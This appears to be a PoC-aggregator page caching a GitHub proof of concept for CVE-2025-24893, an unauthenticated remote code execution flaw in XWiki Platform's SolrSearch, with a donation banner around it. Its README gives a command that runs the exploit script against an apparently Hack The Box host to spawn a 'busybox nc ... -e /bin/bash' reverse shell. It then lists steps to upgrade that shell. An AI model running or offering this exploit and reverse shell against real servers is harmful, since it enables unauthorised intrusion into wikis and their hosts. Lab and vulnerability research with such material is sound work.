Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Source
https://github.com/andwati/CVE-2025-24893
Associated Vulnerability
Title:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
Readme
# Reverse shell for CVE-2025-24893

```bash
 python3 CVE-2025-24893.py  -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"
```

## upgrade the shell
1. `python3 -c 'import pty; pty.spawn("/bin/bash")'`
2. `ctrl + z`
3. `stty size`
4. `stty raw -echo; fg`
5. `stty rows x columns y`
6. `export TERM=xterm`
File Snapshot

 [4.0K]  /data/pocs/6495419db3d0aeaa5d106cacf87607ef52c437c6
├── [1.0K]  CVE-2025-24893.py
└── [ 340]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.